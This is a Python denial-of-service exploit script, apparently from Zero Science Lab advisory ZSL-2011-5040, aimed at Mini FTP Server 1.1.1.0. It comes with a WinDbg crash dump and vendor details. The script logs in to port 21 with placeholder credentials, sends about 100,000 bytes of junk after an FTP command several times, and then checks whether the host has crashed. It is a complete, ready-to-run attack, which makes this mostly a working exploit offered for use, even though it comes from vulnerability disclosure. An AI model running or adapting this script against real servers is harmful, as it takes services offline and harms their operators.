#!/usr/bin/python # # # Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit # # # Vendor: webmaster442 # Product web page: http://miniftpserver.codeplex.com # Affected version: 1.1.1.0 # # Summary: Minimal FTP server for windows. Uses only managed code. Works # with Total commander. # # Desc: MiniFTPServer suffers from a denial of service vulnerability # when passing large number of bytes after authentication, resulting # in a crash. No need for a valid FTP command to exploit this issue. # # Tested on: Microsoft Windows XP Professional SP3 (EN) # # ----------------------------------------------------------------- # # (1540.918): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384 # eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0 nv up ei pl zr na pe nc # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 # 031187d3 3909cmp dword ptr [ecx],ecxds:0023:00000000=???????? # 0:011> d edx # 00f163e880 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00.j.z(.......d... # 00f163f854 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80Tr.............. # 00f1640800 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00....Ld.......... # 00f1641818 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................ # 00f16428b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00................ # 00f1643800 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00............P... # 00f1644800 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00....h..y....pd.. # 00f1645800 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00.............r.. # 0:011> d # 00f1646800 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00..........\{.... # 00f1647880 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79.....d......`..y # 00f16488c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79...............y # 00f16498f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00....A.A.A.A.A.A. # 00f164a841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 00f164b841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 00f164c841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 00f164d841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # # ----------------------------------------------------------------- # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # Zero Science Lab - http://www.zeroscience.mk # # # Advisory ID: ZSL-2011-5040 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php # # # 28.08.2011 # import socket, sys if len(sys.argv) < 2: print ("\n===============================================") print ("\nMini FTP Server 1.1 Remote DoS Exploit\n") print ("Zero Science Lab - http://www.zeroscience.mk") print ("\nID: ZSL-2011-5040") print ("\n===============================================") print ("\n - Usage: "+ sys.argv[0] +" [hostname]\n") sys.exit(0) host = (sys.argv[1]) data = ("A@" * 50000) #Any char and combination would do cmd = ('ALLO') #Any CMD would do, or no CMD at all s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print ("\r\n[+] Attacking: " + host +"\r\n") print ("[*] Please be patient...\r\n") try: s.connect((host, 21)) r=s.recv(1024) print (r) s.send("USER username\r\n") r=s.recv(1024) print (r) s.send("PASS password\r\n") r=s.recv(1024) print (r) s.send(cmd + " " + data + '\r\n') r=s.recv(1024) print (r) print ("[*] Please be patient...\r\n") for x in range(0,10): s.send(cmd + " " + data + '\r\n') r=s.recv(1024) print (r) s.close() try: s.connect((host,21)) except: print ("\r\n[*] Host is down!") except: print ("[*] Oops!")
体验盒子
